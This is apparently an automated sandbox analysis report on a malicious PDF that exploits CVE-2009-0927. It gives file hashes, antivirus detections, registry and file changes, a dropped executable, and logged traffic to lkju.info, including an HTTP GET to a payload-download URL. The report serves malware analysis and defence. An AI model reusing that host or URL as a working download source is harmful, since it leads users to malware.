Analysis Date: 2015-08-10 23:04:29
MD5: 9fd523d28ce3dda94f65a9e06b3de3d9
SHA1: 5effed6acc992bae52a07e3b9c09bb5df0d1c54f

Static Details:

File type: PDF document, version 1.4
AV Grisoft (avg): Script/PDF.Exploit.V
AV Microsoft Security Essentials: no_virus
AV K7: no_virus
AV Twister: no_virus
AV Mcafee: Exploit-PDF.q.gen!stream
AV Arcabit (arcavir): Trojan.Script.474359_Exploit.CVE-2009-0927.Gen_Exploit.XMLCoreSrv.A
AV F-Secure: Trojan.Script.474359
AV Authentium: JS/Pdfka.D.gen
AV Ad-Aware: Trojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AV Emsisoft: Trojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AV VirusBlokAda (vba32): Exploit.JS.Pdfka.ako
AV Zillya!: no_virus
AV ClamAV: Exploit.PDF-672
AV Fortinet: JS/Crypt.PDM!tr
AV CAT (quickheal): no_virus
AV Dr. Web: SCRIPT.Virus
AV Eset (nod32): JS/Exploit.Pdfka.PPL
AV MicroWorld (escan): Trojan.Script.474359
AV MalwareBytes: no_virus
AV Padvish: no_virus
AV CA (E-Trust Ino): PDF/Pidief!generic
AV Kaspersky: Exploit.JS.Pdfka.ako
AV Avira (antivir): EXP/CVE-2009-0927.A.19
AV BullGuard: Trojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AV Rising: Hack.Exploit.MalPDF.a
AV Symantec: Trojan.Gen
AV Ikarus: no_virus
AV Frisk (f-prot): JS/Pdfka.D.gen
AV Alwil (avast): Obfuscated-EW [Trj]
AV BitDefender: Trojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AV Trend Micro: no_virus

Runtime Details:

Process
↳ C:\malware.pdf

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: ..\f.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\AcrobatViewerIsRunning
Creates Mutex: DBWinMutex
Winsock DNS: lkju.info

Process
↳ ..\f.exe

Network Details:

DNS: lkju.info
Type: A
203.189.109.207
HTTP GET: http://lkju.info/zxc/getexe.php?o=2&t=1257004242&i=2154770527&h=ef0085f2&e=4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 203.189.109.207:80

Raw Pcap


Strings